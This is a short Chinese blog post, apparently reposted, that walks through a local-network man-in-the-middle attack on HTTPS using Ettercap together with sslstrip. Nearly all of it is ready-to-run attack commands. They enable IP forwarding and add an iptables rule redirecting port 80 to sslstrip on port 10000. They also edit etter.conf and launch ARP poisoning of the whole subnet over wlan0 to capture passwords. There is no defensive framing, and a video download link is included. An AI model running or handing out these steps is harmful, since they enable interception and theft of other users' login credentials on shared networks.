您的位置:首页 > 理论基础 > 计算机网络

Ettercap结合sslstrip对ssl/https进行攻击

2016-01-23 17:44 711 查看


Ettercap是一个非常强大的嗅探欺骗工具;在以往的ettercap的使用过程中,我们大多用来嗅探http,ftp,和一些加密比较简单的邮箱等的密码,对于新型的ssl/https等的加密协议就显得不是太完美;这里我们使用一款专门针对ssl/https加密协议的工具配合Ettercap进行局域网嗅探欺骗:sslstrip。
以下方法均来自互联网,这里只是记录一下笔者自己使用过程!

1.开启转发:
echo "1">/proc/sys/net/ipv4/ip_forward
2.iptables过滤数据包
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
还有一种方式:修改/etc/ettercap/etter.conf去掉# if you use iptables: redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"的两个注释即可3.监听转发端口
sslstrip -l 10000
4.arp嗅探
ettercap -T -q -i wlan0 -M arp:remote // //







视频:
清晰版下载地址:http://pan.baidu.com/s/1qWJbFrA
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: